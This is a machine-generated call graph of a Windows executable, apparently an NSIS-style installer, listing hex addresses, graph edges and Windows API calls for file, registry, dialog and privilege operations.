5424 10001b18 20 API calls 5423->5424 5425 100016ec 5424->5425 5426 100016f3 5425->5426 5427 100016ff 5425->5427 5428 10001272 2 API calls 5426->5428 5429 10001726 5427->5429 5430 10001709 5427->5430 5433 100016fd 5428->5433 5431 10001750 5429->5431 5432 1000172c 5429->5432 5434 1000153d 3 API calls 5430->5434 5436 1000153d 3 API calls 5431->5436 5435 100015b4 3 API calls 5432->5435 5437 1000170e 5434->5437 5438 10001731 5435->5438 5436->5433 5439 100015b4 3 API calls 5437->5439 5440 10001272 2 API calls 5438->5440 5441 10001714 5439->5441 5442 10001737 GlobalFree 5440->5442 5443 10001272 2 API calls 5441->5443 5442->5433 5445 1000174b GlobalFree 5442->5445 5444 1000171a GlobalFree 5443->5444 5444->5433 5445->5433 5446 10002238 5447 10002296 5446->5447 5449 100022cc 5446->5449 5448 100022a8 GlobalAlloc 5447->5448 5447->5449 5448->5447 5450 401cfa GetDlgItem GetClientRect 5451 402bbf 18 API calls 5450->5451 5452 401d2c LoadImageW SendMessageW 5451->5452 5453 401d4a DeleteObject 5452->5453 5454 402a4c 5452->5454 5453->5454 4979 40237b 4980 402381 4979->4980 4981 402bbf 18 API calls 4980->4981 4982 402393 4981->4982 4983 402bbf 18 API calls 4982->4983 4984 40239d RegCreateKeyExW 4983->4984 4985 4023c7 4984->4985 4986 40281e 4984->4986 4987 4023e2 4985->4987 4988 402bbf 18 API calls 4985->4988 4989 4023ee 4987->4989 4991 402ba2 18 API calls 4987->4991 4990 4023d8 lstrlenW 4988->4990 4992 402409 RegSetValueExW 4989->4992 4993 403027 32 API calls 4989->4993 4990->4987 4991->4989 4994 40241f RegCloseKey 4992->4994 4993->4992 4994->4986 5455 4027fb 5456 402bbf 18 API calls 5455->5456 5457 402802 FindFirstFileW 5456->5457 5458 402815 5457->5458 5459 40282a 5457->5459 5460 402833 5459->5460 5463 405f79 wsprintfW 5459->5463 5464 406032 lstrcpynW 5460->5464 5463->5460 5464->5458 4996 40327d SetErrorMode GetVersion 4997 4032b1 4996->4997 4998 4032b7 4996->4998 5000 406408 5 API calls 4997->5000 4999 40639c 3 API calls 4998->4999 5001 4032ce 4999->5001 5000->4998 5002 40639c 3 API calls 5001->5002 5003 4032d8 5002->5003 5004 40639c 3 API calls 5003->5004 5005 4032e2 5004->5005 5006 406408 5 API calls 5005->5006 5007 4032e9 5006->5007 5008 406408 5 API calls 5007->5008 5009 4032f0 #17 OleInitialize SHGetFileInfoW 5008->5009 5087 406032 lstrcpynW 5009->5087 5011 40332d GetCommandLineW 5088 406032 lstrcpynW 5011->5088 5013 40333f GetModuleHandleW 5014 403357 5013->5014 5015 405a13 CharNextW 5014->5015 5016 403366 CharNextW 5015->5016 5017 403491 GetTempPathW 5016->5017 5027 40337f 5016->5027 5089 40324c 5017->5089 5019 4034a9 5020 403503 DeleteFileW 5019->5020 5021 4034ad GetWindowsDirectoryW lstrcatW 5019->5021 5099 402dee GetTickCount GetModuleFileNameW 5020->5099 5022 40324c 12 API calls 5021->5022 5025 4034c9 5022->5025 5023 405a13 CharNextW 5023->5027 5025->5020 5028 4034cd GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 5025->5028 5026 403517 5029 4035ca 5026->5029 5034 4035ba 5026->5034 5038 405a13 CharNextW 5026->5038 5027->5023 5032 40347c 5027->5032 5033 40347a 5027->5033 5031 40324c 12 API calls 5028->5031 5186 4037a1 5029->5186 5036 4034fb 5031->5036 5183 406032 lstrcpynW 5032->5183 5033->5017 5127 40387b 5034->5127 5036->5020 5036->5029 5051 403536 5038->5051 5040 403705 5043 403789 ExitProcess 5040->5043 5044 40370d GetCurrentProcess OpenProcessToken 5040->5044 5041 4035e5 5042 405777 MessageBoxIndirectW 5041->5042 5046 4035f3 ExitProcess 5042->5046 5049 403725 LookupPrivilegeValueW AdjustTokenPrivileges 5044->5049 5050 403759 5044->5050 5047 403594 5052 405aee 18 API calls 5047->5052 5048 4035fb 5053 4056fa 5 API calls 5048->5053 5049->5050 5054 406408 5 API calls 5050->5054 5051->5047 5051->5048 5055 4035a0 5052->5055 5056 403600 lstrcatW 5053->5056 5057 403760 5054->5057 5055->5029 5184 406032 lstrcpynW 5055->5184 5058 403611 lstrcatW 5056->5058 5059 40361c lstrcatW lstrcmpiW 5056->5059 5060 403775 ExitWindowsEx 5057->5060 5061 403782 5057->5061 5058->5059 5059->5029 5063 403638 5059->5063 5060->5043 5060->5061 5064 40140b 2 API calls 5061->5064 5066 403644 5063->5066 5067 40363d 5063->5067 5064->5043 5065 4035af 5185 406032 lstrcpynW 5065->5185 5070 4056dd 2 API calls 5066->5070 5069 405660 4 API calls 5067->5069 5072 403642 5069->5072 5071 403649 SetCurrentDirectoryW 5070->5071 5073 403664 5071->5073 5074 403659 5071->5074 5072->5071 5194 406032 lstrcpynW 5073->5194 5193 406032 lstrcpynW 5074->5193 5077 406054 18 API calls 5078 4036a3 DeleteFileW 5077->5078 5079 4036b0 CopyFileW 5078->5079 5084 403672 5078->5084 5079->5084 5080 4036f9 5081 405ed3 38 API calls 5080->5081 5081->5029 5082 405ed3 38 API calls 5082->5084 5083 406054 18 API calls 5083->5084 5084->5077 5084->5080 5084->5082 5084->5083 5085 405712 2 API calls 5084->5085 5086 4036e4 CloseHandle 5084->5086 5085->5084 5086->5084 5087->5011 5088->5013 5090 4062c6 5 API calls 5089->5090 5091 403258 5090->5091 5092 403262 5091->5092 5093 4059e6 3 API calls 5091->5093 5092->5019 5094 40326a 5093->5094 5095 4056dd 2 API calls 5094->5095 5096 403270 5095->5096 5097 405c36 2 API calls 5096->5097 5098 40327b 5097->5098 5098->5019 5195 405c07 GetFileAttributesW CreateFileW 5099->5195 5101 402e2e 5102 402e3e 5101->5102 5196 406032 lstrcpynW 5101->5196 5102->5026 5104 402e54 5105 405a32 2 API calls 5104->5105 5106 402e5a 5105->5106 5197 406032 lstrcpynW 5106->5197 5108 402e65 GetFileSize 5123 402f61 5108->5123 5126 402e7c 5108->5126 5110 402f6a 5110->5102 5112 402f9a GlobalAlloc 5110->5112 5210 403235 SetFilePointer 5110->5210 5111 40321f ReadFile 5111->5126 5209 403235 SetFilePointer 5112->5209 5113 402fcd 5117 402d8a 6 API calls 5113->5117 5116 402fb5 5120 403027 32 API calls 5116->5120 5117->5102 5118 402f83 5119 40321f ReadFile 5118->5119 5122 402f8e 5119->5122 5124 402fc1 5120->5124 5121 402d8a 6 API calls 5121->5126 5122->5102 5122->5112 5198 402d8a 5123->5198 5124->5102 5124->5124 5125 402ffe SetFilePointer 5124->5125 5125->5102 5126->5102 5126->5111 5126->5113 5126->5121 5126->5123 5128 406408 5 API calls 5127->5128 5129 40388f 5128->5129 5130 403895 5129->5130 5131 4038a7 5129->5131 5220 405f79 wsprintfW 5130->5220 5132 405eff 3 API calls 5131->5132 5133 4038d7 5132->5133 5135 4038f6 lstrcatW 5133->5135 5137 405eff 3 API calls 5133->5137 5136 4038a5 5135->5136 5211 403b51 5136->5211 5137->5135 5140 405aee 18 API calls 5141 403928 5140->5141 5142 4039bc 5141->5142 5144 405eff 3 API calls 5141->5144 5143 405aee 18 API calls 5142->5143 5145 4039c2 5143->5145 5147 40395a 5144->5147 5146 4039d2 LoadImageW 5145->5146 5148 406054 18 API calls 5145->5148 5149 403a78 5146->5149 5150 4039f9 RegisterClassW 5146->5150 5147->5142 5151 40397b lstrlenW 5147->5151 5155 405a13 CharNextW 5147->5155 5148->5146 5153 40140b 2 API calls 5149->5153 5152 403a2f SystemParametersInfoW CreateWindowExW 5150->5152 5182 403a82 5150->5182 5156 403989 lstrcmpiW 5151->5156 5157 4039af 5151->5157 5152->5149 5154 403a7e 5153->5154 5161 403b51 19 API calls 5154->5161 5154->5182 5159 403978 5155->5159 5156->5157 5160 403999 GetFileAttributesW 5156->5160 5158 4059e6 3 API calls 5157->5158 5162 4039b5 5158->5162 5159->5151 5163 4039a5 5160->5163 5165 403a8f 5161->5165 5221 406032 lstrcpynW 5162->5221 5163->5157 5164 405a32 2 API calls 5163->5164 5164->5157 5167 403a9b ShowWindow 5165->5167 5168 403b1e 5165->5168 5170 40639c 3 API calls 5167->5170 5169 405264 5 API calls 5168->5169 5171 403b24 5169->5171 5172 403ab3 5170->5172 5173 403b40 5171->5173 5174 403b28 5171->5174 5175 403ac1 GetClassInfoW 5172->5175 5177 40639c 3 API calls 5172->5177 5176 40140b 2 API calls 5173->5176 5180 40140b 2 API calls 5174->5180 5174->5182 5178 403ad5 GetClassInfoW RegisterClassW 5175->5178 5179 403aeb DialogBoxParamW 5175->5179 5176->5182 5177->5175 5178->5179 5181 40140b 2 API calls 5179->5181 5180->5182 5181->5182 5182->5029 5183->5033 5184->5065 5185->5034 5187 4037b9 5186->5187 5188 4037ab CloseHandle 5186->5188 5223 4037e6 5187->5223 5188->5187 5191 405823 69 API calls 5192 4035d3 OleUninitialize 5191->5192 5192->5040 5192->5041 5193->5073 5194->5084 5195->5101 5196->5104 5197->5108 5199 402d93 5198->5199 5200 402dab 5198->5200 5201 402da3 5199->5201 5202 402d9c DestroyWindow 5199->5202 5203 402db3 5200->5203 5204 402dbb GetTickCount 5200->5204 5201->5110 5202->5201 5205 406444 2 API calls 5203->5205 5206 402dc9 CreateDialogParamW ShowWindow 5204->5206 5207 402dec 5204->5207 5208 402db9 5205->5208 5206->5207 5207->5110 5208->5110 5209->5116 5210->5118 5212 403b65 5211->5212 5222 405f79 wsprintfW 5212->5222 5214 403bd6 5215 406054 18 API calls 5214->5215 5216 403be2 SetWindowTextW 5215->5216 5217 403906 5216->5217 5218 403bfe 5216->5218 5217->5140 5218->5217 5219 406054 18 API calls 5218->5219 5219->5218 5220->5136 5221->5142 5222->5214 5224 4037f4 5223->5224 5225 4037be 5224->5225 5226 4037f9 FreeLibrary GlobalFree 5224->5226 5225->5191 5226->5225 5226->5226 5465 1000103d 5466 1000101b 5 API calls 5465->5466 5467 10001056 5466->5467 5468 4014ff 5469 401507 5468->5469 5471 40151a 5468->5471 5470 402ba2 18 API calls 5469->5470 5470->5471 5472 401000 5473 401037 BeginPaint GetClientRect 5472->5473 5476 40100c DefWindowProcW 5472->5476 5474 4010f3 5473->5474 5477 401073 CreateBrushIndirect FillRect DeleteObject 5474->5477 5478 4010fc 5474->5478 5479 401179 5476->5479 5477->5474 5480 401102 CreateFontIndirectW 5478->5480 5481 401167 EndPaint 5478->5481 5480->5481 5482 401112 6 API calls 5480->5482 5481->5479 5482->5481 5483 401904 5484 40193b 5483->5484 5485 402bbf 18 API calls 5484->5485 5486 401940 5485->5486 5487 405823 69 API calls 5486->5487 5488 401949 5487->5488 5489 402d04 5490 402d16 SetTimer 5489->5490 5492 402d2f 5489->5492 5490->5492 5491 402d84 5492->5491 5493 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5492->5493 5493->5491 5494 405105 5495 405115 5494->5495 5496 405129 5494->5496 5497 40511b 5495->5497 5506 405172 5495->5506 5498 405131 IsWindowVisible 5496->5498 5504 405148 5496->5504 5500 404142 SendMessageW 5497->5500 5501 40513e 5498->5501 5498->5506 5499 405177 CallWindowProcW 5502 405125 5499->5502 5500->5502 5507 404a5b SendMessageW 5501->5507 5504->5499 5512 404adb 5504->5512 5506->5499 5508 404aba SendMessageW 5507->5508 5509 404a7e GetMessagePos ScreenToClient SendMessageW 5507->5509 5510 404ab2 5508->5510 5509->5510 5511 404ab7 5509->5511 5510->5504 5511->5508 5521 406032 lstrcpynW 5512->5521 5514 404aee 5522 405f79 wsprintfW 5514->5522 5516 404af8 5517 40140b 2 API calls 5516->5517 5518 404b01 5517->5518 5523 406032 lstrcpynW 5518->5523 5520 404b08 5520->5506 5521->5514 5522->5516 5523->5520 4279 402786 4280 40278d 4279->4280 4282 4029f7 4279->4282 4287 402ba2 4280->4287 4283 402798 4284 40279f SetFilePointer 4283->4284 4284->4282 4285 4027af 4284->4285 4290 405f79 wsprintfW 4285->4290 4288 406054 18 API calls 4287->4288 4289 402bb6 4288->4289 4289->4283 4290->4282 5524 401907 5525 402bbf 18 API calls 5524->5525 5526 40190e 5525->5526 5527 405777 MessageBoxIndirectW 5526->5527 5528 401917 5527->5528 5529 401e08 5530 402bbf 18 API calls 5529->5530 5531 401e0e 5530->5531 5532 402bbf 18 API calls 5531->5532 5533 401e17 5532->5533 5534 402bbf 18 API calls 5533->5534 5535 401e20 5534->5535 5536 402bbf 18 API calls 5535->5536 5537 401e29 5536->5537 5538 401423 25 API calls 5537->5538 5539 401e30 ShellExecuteW 5538->5539 5540 401e61 5539->5540 5546 40420a lstrcpynW lstrlenW 5547 404b0d GetDlgItem GetDlgItem 5548 404b5f 7 API calls 5547->5548 5552 404d78 5547->5552 5549 404c02 DeleteObject 5548->5549 5550 404bf5 SendMessageW 5548->5550 5551 404c0b 5549->5551 5550->5549 5553 404c42 5551->5553 5555 406054 18 API calls 5551->5555 5565 404a5b 5 API calls 5552->5565 5570 404e5c 5552->5570 5579 404de9 5552->5579 5556 4040f6 19 API calls 5553->5556 5554 404f08 5558 404f12 SendMessageW 5554->5558 5559 404f1a 5554->5559 5560 404c24 SendMessageW SendMessageW 5555->5560 5561 404c56 5556->5561 5557 404d6b 5563 40415d 8 API calls 5557->5563 5558->5559 5571 404f33 5559->5571 5572 404f2c ImageList_Destroy 5559->5572 5576 404f43 5559->5576 5560->5551 5566 4040f6 19 API calls 5561->5566 5562 404eb5 SendMessageW 5562->5557 5568 404eca SendMessageW 5562->5568 5569 4050fe 5563->5569 5564 404e4e SendMessageW 5564->5570 5565->5579 5580 404c64 5566->5580 5567 4050b2 5567->5557 5577 4050c4 ShowWindow GetDlgItem ShowWindow 5567->5577 5574 404edd 5568->5574 5570->5554 5570->5557 5570->5562 5575 404f3c GlobalFree 5571->5575 5571->5576 5572->5571 5573 404d39 GetWindowLongW SetWindowLongW 5578 404d52 5573->5578 5585 404eee SendMessageW 5574->5585 5575->5576 5576->5567 5590 404adb 4 API calls 5576->5590 5594 404f7e 5576->5594 5577->5557 5581 404d70 5578->5581 5582 404d58 ShowWindow 5578->5582 5579->5564 5579->5570 5580->5573 5584 404cb4 SendMessageW 5580->5584 5586 404d33 5580->5586 5588 404cf0 SendMessageW 5580->5588 5589 404d01 SendMessageW 5580->5589 5599 40412b SendMessageW 5581->5599 5598 40412b SendMessageW 5582->5598 5584->5580 5585->5554 5586->5573 5586->5578 5588->5580 5589->5580 5590->5594 5591 405088 InvalidateRect 5591->5567 5592 40509e 5591->5592 5600 404a16 5592->5600 5593 404fac SendMessageW 5597 404fc2 5593->5597 5594->5593 5594->5597 5596 405036 SendMessageW SendMessageW 5596->5597 5597->5591 5597->5596 5598->5557 5599->5552 5603 40494d 5600->5603 5602 404a2b 5602->5567 5604 404966 5603->5604 5605 406054 18 API calls 5604->5605 5606 4049ca 5605->5606 5607 406054 18 API calls 5606->5607 5608 4049d5 5607->5608 5609 406054 18 API calls 5608->5609 5610 4049eb lstrlenW wsprintfW SetDlgItemTextW 5609->5610 5610->5602 5611 1000164f 5612 10001516 GlobalFree 5611->5612 5614 10001667 5612->5614 5613 100016ad GlobalFree 5614->5613 5615 10001682 5614->5615 5616 10001699 VirtualFree 5614->5616 5615->5613 5616->5613 5617 404591 5618 4045bd 5617->5618 5619 4045ce 5617->5619 5678 40575b GetDlgItemTextW 5618->5678 5621 4045da GetDlgItem 5619->5621 5627 404639 5619->5627 5623 4045ee 5621->5623 5622 4045c8 5625 4062c6 5 API calls 5622->5625 5626 404602 SetWindowTextW 5623->5626 5630 405a91 4 API calls 5623->5630 5624 40471d 5675 4048cc 5624->5675 5680 40575b GetDlgItemTextW 5624->5680 5625->5619 5631 4040f6 19 API calls 5626->5631 5627->5624 5632 406054 18 API calls 5627->5632 5627->5675 5629 40415d 8 API calls 5634 4048e0 5629->5634 5635 4045f8 5630->5635 5636 40461e 5631->5636 5637 4046ad SHBrowseForFolderW 5632->5637 5633 40474d 5638 405aee 18 API calls 5633->5638 5635->5626 5644 4059e6 3 API calls 5635->5644 5639 4040f6 19 API calls 5636->5639 5637->5624 5640 4046c5 CoTaskMemFree 5637->5640 5641 404753 5638->5641 5642 40462c 5639->5642 5643 4059e6 3 API calls 5640->5643 5681 406032 lstrcpynW 5641->5681 5679 40412b SendMessageW 5642->5679 5646 4046d2 5643->5646 5644->5626 5649 404709 SetDlgItemTextW 5646->5649 5653 406054 18 API calls 5646->5653 5648 404632 5651 406408 5 API calls 5648->5651 5649->5624 5650 40476a 5652 406408 5 API calls 5650->5652 5651->5627 5660 404771 5652->5660 5654 4046f1 lstrcmpiW 5653->5654 5654->5649 5657 404702 lstrcatW 5654->5657 5655 4047b2 5682 406032 lstrcpynW 5655->5682 5657->5649 5658 4047b9 5659 405a91 4 API calls 5658->5659 5661 4047bf GetDiskFreeSpaceW 5659->5661 5660->5655 5664 405a32 2 API calls 5660->5664 5665 40480a 5660->5665 5663 4047e3 MulDiv 5661->5663 5661->5665 5663->5665 5664->5660 5666 404a16 21 API calls 5665->5666 5676 40487b 5665->5676 5667 404868 5666->5667 5670 40487d SetDlgItemTextW 5667->5670 5671 40486d 5667->5671 5668 40140b 2 API calls 5669 40489e 5668->5669 5683 404118 KiUserCallbackDispatcher 5669->5683 5670->5676 5674 40494d 21 API calls 5671->5674 5673 4048ba 5673->5675 5684 404526 5673->5684 5674->5676 5675->5629 5676->5668 5676->5669 5678->5622 5679->5648 5680->5633 5681->5650 5682->5658 5683->5673 5685 404534 5684->5685 5686 404539 SendMessageW 5684->5686 5685->5686 5686->5675 5690 404293 5691 4042ab 5690->5691 5694 4043c5 5690->5694 5695 4040f6 19 API calls 5691->5695 5692 40442f 5693 404439 GetDlgItem 5692->5693 5696 404501 5692->5696 5698 404453 5693->5698 5699 4044c2 5693->5699 5694->5692 5694->5696 5700 404400 GetDlgItem SendMessageW 5694->5700 5701 404312 5695->5701 5697 40415d 8 API calls 5696->5697 5703 4044fc 5697->5703 5698->5699 5704 404479 6 API calls 5698->5704 5699->5696 5705 4044d4 5699->5705 5721 404118 KiUserCallbackDispatcher 5700->5721 5702 4040f6 19 API calls 5701->5702 5707 40431f CheckDlgButton 5702->5707 5704->5699 5708 4044ea 5705->5708 5709 4044da SendMessageW 5705->5709 5719 404118 KiUserCallbackDispatcher 5707->5719 5708->5703 5712 4044f0 SendMessageW 5708->5712 5709->5708 5710 40442a 5713 404526 SendMessageW 5710->5713 5712->5703 5713->5692 5714 40433d GetDlgItem 5720 40412b SendMessageW 5714->5720 5716 404353 SendMessageW 5717 404370 GetSysColor 5716->5717 5718 404379 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5716->5718 5717->5718 5718->5703 5719->5714 5720->5716 5721->5710 4384 402095 4385 402bbf 18 API calls 4384->4385 4386 40209c 4385->4386 4387 402bbf 18 API calls 4386->4387 4388 4020a6 4387->4388 4389 402bbf 18 API calls 4388->4389 4390 4020b0 4389->4390 4391 402bbf 18 API calls 4390->4391 4392 4020ba 4391->4392 4393 402bbf 18 API calls 4392->4393 4395 4020c4 4393->4395 4394 402103 CoCreateInstance 4398 402122 4394->4398 4395->4394 4396 402bbf 18 API calls 4395->4396 4396->4394 4397 401423 25 API calls 4399 4021e1 4397->4399 4398->4397 4398->4399 5722 401a15 5723 402bbf 18 API calls 5722->5723 5724 401a1e ExpandEnvironmentStringsW 5723->5724 5725 401a32 5724->5725 5727 401a45 5724->5727 5726 401a37 lstrcmpW 5725->5726 5725->5727 5726->5727 5728 402515 5729 402bbf 18 API calls 5728->5729 5730 40251c 5729->5730 5733 405c07 GetFileAttributesW CreateFileW 5730->5733 5732 402528 5733->5732 5734 401b16 5735 402bbf 18 API calls 5734->5735 5736 401b1d 5735->5736 5737 402ba2 18 API calls 5736->5737 5738 401b26 wsprintfW 5737->5738 5739 402a4c 5738->5739 5740 10001058 5742 10001074 5740->5742 5741 100010dd 5742->5741 5743 10001092 5742->5743 5744 10001516 GlobalFree 5742->5744 5745 10001516 GlobalFree 5743->5745 5744->5743 5746 100010a2 5745->5746 5747 100010b2 5746->5747 5748 100010a9 GlobalSize 5746->5748 5749 100010b6 GlobalAlloc 5747->5749 5750 100010c7 5747->5750 5748->5747 5751 1000153d 3 API calls 5749->5751 5752 100010d2 GlobalFree 5750->5752 5751->5750 5752->5741 4413 40159b 4414 402bbf 18 API calls 4413->4414 4415 4015a2 SetFileAttributesW 4414->4415 4416 4015b4 4415->4416 5753 40229d 5754 4022a5 5753->5754 5755 4022ab 5753->5755 5757 402bbf 18 API calls 5754->5757 5756 4022b9 5755->5756 5758 402bbf 18 API calls 5755->5758 5759 4022c7 5756->5759 5760 402bbf 18 API calls 5756->5760 5757->5755 5758->5756 5761 402bbf 18 API calls 5759->5761 5760->5759 5762 4022d0 WritePrivateProfileStringW 5761->5762 5763 401f1d 5764 402bbf 18 API calls 5763->5764 5765 401f24 5764->5765 5766 406408 5 API calls 5765->5766 5767 401f33 5766->5767 5768 401fb7 5767->5768 5769 401f4f GlobalAlloc 5767->5769 5769->5768 5770 401f63 5769->5770 5771 406408 5 API calls 5770->5771 5772 401f6a 5771->5772 5773 406408 5 API calls 5772->5773 5774 401f74 5773->5774 5774->5768 5778 405f79 wsprintfW 5774->5778 5776 401fa9 5779 405f79 wsprintfW 5776->5779 5778->5776 5779->5768 4425 403c1e 4426 403d71 4425->4426 4427 403c36 4425->4427 4429 403d82 GetDlgItem GetDlgItem 4426->4429 4438 403dc2 4426->4438 4427->4426 4428 403c42 4427->4428 4430 403c60 4428->4430 4431 403c4d SetWindowPos 4428->4431 4432 4040f6 19 API calls 4429->4432 4435 403c65 ShowWindow 4430->4435 4436 403c7d 4430->4436 4431->4430 4437 403dac KiUserCallbackDispatcher 4432->4437 4433 403e1c 4434 404142 SendMessageW 4433->4434 4443 403d6c 4433->4443 4485 403e2e 4434->4485 4435->4436 4439 403c85 DestroyWindow 4436->4439 4440 403c9f 4436->4440 4495 40140b 4437->4495 4438->4433 4442 401389 2 API calls 4438->4442 4444 40407f 4439->4444 4445 403ca4 SetWindowLongW 4440->4445 4446 403cb5 4440->4446 4447 403df4 4442->4447 4444->4443 4454 4040b0 ShowWindow 4444->4454 4445->4443 4450 403cc1 GetDlgItem 4446->4450 4451 403d5e 4446->4451 4447->4433 4452 403df8 SendMessageW 4447->4452 4448 40140b 2 API calls 4448->4485 4449 404081 DestroyWindow EndDialog 4449->4444 4455 403cf1 4450->4455 4456 403cd4 SendMessageW IsWindowEnabled 4450->4456 4453 40415d 8 API calls 4451->4453 4452->4443 4453->4443 4454->4443 4458 403cfe 4455->4458 4459 403d45 SendMessageW 4455->4459 4460 403d11 4455->4460 4468 403cf6 4455->4468 4456->4443 4456->4455 4457 406054 18 API calls 4457->4485 4458->4459 4458->4468 4459->4451 4463 403d19 4460->4463 4464 403d2e 4460->4464 4461 4040cf SendMessageW 4465 403d2c 4461->4465 4462 4040f6 19 API calls 4462->4485 4466 40140b 2 API calls 4463->4466 4467 40140b 2 API calls 4464->4467 4465->4451 4466->4468 4469 403d35 4467->4469 4468->4461 4469->4451 4469->4468 4470 4040f6 19 API calls 4471 403ea9 GetDlgItem 4470->4471 4472 403ec6 ShowWindow KiUserCallbackDispatcher 4471->4472 4473 403ebe 4471->4473 4498 404118 KiUserCallbackDispatcher 4472->4498 4473->4472 4475 403ef0 EnableWindow 4478 403f04 4475->4478 4476 403f09 GetSystemMenu EnableMenuItem SendMessageW 4477 403f39 SendMessageW 4476->4477 4476->4478 4477->4478 4478->4476 4499 40412b SendMessageW 4478->4499 4500 406032 lstrcpynW 4478->4500 4481 403f67 lstrlenW 4482 406054 18 API calls 4481->4482 4483 403f7d SetWindowTextW 4482->4483 4484 401389 2 API calls 4483->4484 4484->4485 4485->4443 4485->4448 4485->4449 4485->4457 4485->4462 4485->4470 4486 403fc1 DestroyWindow 4485->4486 4486->4444 4487 403fdb CreateDialogParamW 4486->4487 4487->4444 4488 40400e 4487->4488 4489 4040f6 19 API calls 4488->4489 4490 404019 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4489->4490 4491 401389 2 API calls 4490->4491 4492 40405f 4491->4492 4492->4443 4493 404067 ShowWindow 4492->4493 4494 404142 SendMessageW 4493->4494 4494->4444 4496 401389 2 API calls 4495->4496 4497 401420 4496->4497 4497->4438 4498->4475 4499->4478 4500->4481 4501 40249e 4512 402cc9 4501->4512 4503 4024a8 4504 402ba2 18 API calls 4503->4504 4505 4024b1 4504->4505 4506 4024bc 4505->4506 4510 40281e 4505->4510 4507 4024d5 RegEnumValueW 4506->4507 4508 4024c9 RegEnumKeyW 4506->4508 4509 4024ee RegCloseKey 4507->4509 4507->4510 4508->4509 4509->4510 4513 402bbf 18 API calls 4512->4513 4514 402ce2 4513->4514 4515 402cf0 RegOpenKeyExW 4514->4515 4515->4503 5780 40149e 5781 4014ac PostQuitMessage 5780->5781 5782 402288 5780->5782 5781->5782 4538 40231f 4539 402324 4538->4539 4540 40234f 4538->4540 4542 402cc9 19 API calls 4539->4542 4541 402bbf 18 API calls 4540->4541 4546 402356 4541->4546 4543 40232b 4542->4543 4544 402335 4543->4544 4547 40236c 4543->4547 4545 402bbf 18 API calls 4544->4545 4548 40233c RegDeleteValueW RegCloseKey 4545->4548 4550 402bff RegOpenKeyExW 4546->4550 4548->4547 4551 402c93 4550->4551 4559 402c2a 4550->4559 4551->4547 4552 402c50 RegEnumKeyW 4553 402c62 RegCloseKey 4552->4553 4552->4559 4561 406408 GetModuleHandleA 4553->4561 4554 402c87 RegCloseKey 4558 402c76 4554->4558 4556 402bff 5 API calls 4556->4559 4558->4551 4559->4552 4559->4553 4559->4554 4559->4556 4560 402ca2 RegDeleteKeyW 4560->4558 4562 406424 4561->4562 4563 40642e GetProcAddress 4561->4563 4567 40639c GetSystemDirectoryW 4562->4567 4565 402c72 4563->4565 4565->4558 4565->4560 4566 40642a 4566->4563 4566->4565 4568 4063be wsprintfW LoadLibraryW 4567->4568 4568->4566 5783 100010e1 5784 10001111 5783->5784 5785 100011d8 GlobalFree 5784->5785 5786 100012ba 2 API calls 5784->5786 5787 100011d3 5784->5787 5788 10001272 2 API calls 5784->5788 5789 10001164 GlobalAlloc 5784->5789 5790 100011f8 GlobalFree 5784->5790 5791 100011c4 GlobalFree 5784->5791 5792 100012e1 lstrcpyW 5784->5792 5786->5784 5787->5785 5788->5791 5789->5784 5790->5784 5791->5784 5792->5784 5793 401ca3 5794 402ba2 18 API calls 5793->5794 5795 401ca9 IsWindow 5794->5795 5796 401a05 5795->5796 5797 402a27 SendMessageW 5798 402a41 InvalidateRect 5797->5798 5799 402a4c 5797->5799 5798->5799 5800 40242a 5801 402cc9 19 API calls 5800->5801 5802 402434 5801->5802 5803 402bbf 18 API calls 5802->5803 5804 40243d 5803->5804 5805 402448 RegQueryValueExW 5804->5805 5809 40281e 5804->5809 5806 40246e RegCloseKey 5805->5806 5807 402468 5805->5807 5806->5809 5807->5806 5811 405f79 wsprintfW 5807->5811 5811->5806 4811 40172d 4812 402bbf 18 API calls 4811->4812 4813 401734 SearchPathW 4812->4813 4814 40174f 4813->4814 5812 4027b4 5813 4027ba 5812->5813 5814 4027c2 FindClose 5813->5814 5815 402a4c 5813->5815 5814->5815 5816 401b37 5817 401b44 5816->5817 5818 401b88 5816->5818 5819 401bcd 5817->5819 5825 401b5b 5817->5825 5820 401bb2 GlobalAlloc 5818->5820 5821 401b8d 5818->5821 5822 406054 18 API calls 5819->5822 5828 402288 5819->5828 5823 406054 18 API calls 5820->5823 5821->5828 5837 406032 lstrcpynW 5821->5837 5824 402282 5822->5824 5823->5819 5830 405777 MessageBoxIndirectW 5824->5830 5835 406032 lstrcpynW 5825->5835 5829 401b9f GlobalFree 5829->5828 5830->5828 5831 401b6a 5836 406032 lstrcpynW 5831->5836 5833 401b79 5838 406032 lstrcpynW 5833->5838 5835->5831 5836->5833 5837->5829 5838->5828 5839 402537 5840 402562 5839->5840 5841 40254b 5839->5841 5843 402596 5840->5843 5844 402567 5840->5844 5842 402ba2 18 API calls 5841->5842 5849 402552 5842->5849 5845 402bbf 18 API calls 5843->5845 5846 402bbf 18 API calls 5844->5846 5847 40259d lstrlenW 5845->5847 5848 40256e WideCharToMultiByte lstrlenA 5846->5848 5847->5849 5848->5849 5851 405ce8 5 API calls 5849->5851 5852 4025e0 5849->5852 5853 4025ca 5849->5853 5850 405cb9 WriteFile 5850->5852 5851->5853 5853->5850 5853->5852 5854 4014b8 5855 4014be 5854->5855 5856 401389 2 API calls 5855->5856 5857 4014c6 5856->5857 4867 4015b9 4868 402bbf 18 API calls 4867->4868 4869 4015c0 4868->4869 4886 405a91 CharNextW CharNextW 4869->4886 4871 401629 4873 40165b 4871->4873 4874 40162e 4871->4874 4872 405a13 CharNextW 4880 4015c9 4872->4880 4876 401423 25 API calls 4873->4876 4875 401423 25 API calls 4874->4875 4877 401635 4875->4877 4884 401653 4876->4884 4900 406032 lstrcpynW 4877->4900 4880->4871 4880->4872 4883 40160f GetFileAttributesW 4880->4883 4892 4056fa 4880->4892 4895 405660 CreateDirectoryW 4880->4895 4901 4056dd CreateDirectoryW 4880->4901 4882 401642 SetCurrentDirectoryW 4882->4884 4883->4880 4887 405ac0 4886->4887 4888 405aae 4886->4888 4890 405a13 CharNextW 4887->4890 4891 405ae4 4887->4891 4888->4887 4889 405abb CharNextW 4888->4889 4889->4891 4890->4887 4891->4880 4893 406408 5 API calls 4892->4893 4894 405701 4893->4894 4894->4880 4896 4056b1 GetLastError 4895->4896 4897 4056ad 4895->4897 4896->4897 4898 4056c0 SetFileSecurityW 4896->4898 4897->4880 4898->4897 4899 4056d6 GetLastError 4898->4899 4899->4897 4900->4882 4902 4056f1 GetLastError 4901->4902 4903 4056ed 4901->4903 